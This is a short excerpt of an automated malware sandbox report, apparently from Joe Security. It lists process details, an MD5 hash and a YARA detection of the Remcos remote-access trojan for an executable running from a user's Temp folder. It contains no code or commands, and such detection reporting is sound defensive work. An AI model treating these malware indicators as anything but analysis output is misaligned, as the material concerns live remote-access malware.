00000006.00000000.1880838318.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	11:36:16
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\dyfwtd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\dyfwtd.exe"
Imagebase:	0x400000
File size:	4'054'528 bytes
MD5 hash:	27650AFE28BA588C759ADE95BF403833
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false